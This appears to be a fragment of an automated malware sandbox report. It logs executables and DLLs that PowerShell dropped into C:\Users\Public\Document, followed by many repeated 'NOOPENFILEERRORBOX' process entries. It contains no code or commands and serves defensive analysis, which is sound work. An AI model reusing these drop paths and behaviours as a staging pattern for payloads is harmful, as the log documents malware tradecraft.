                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\tcl\reg1.3\tclreg13.dllJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\Scripts\pip3.12.exeJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\Scripts\wsdump.exeJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\tcl\nmake\x86_64-w64-mingw32-nmakehlp.exeJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\tcl\dde1.4\tcldde14.dllJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\Scripts\normalizer.exeJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\Scripts\pip3.exeJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\Scripts\pip.exeJump to dropped file
                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
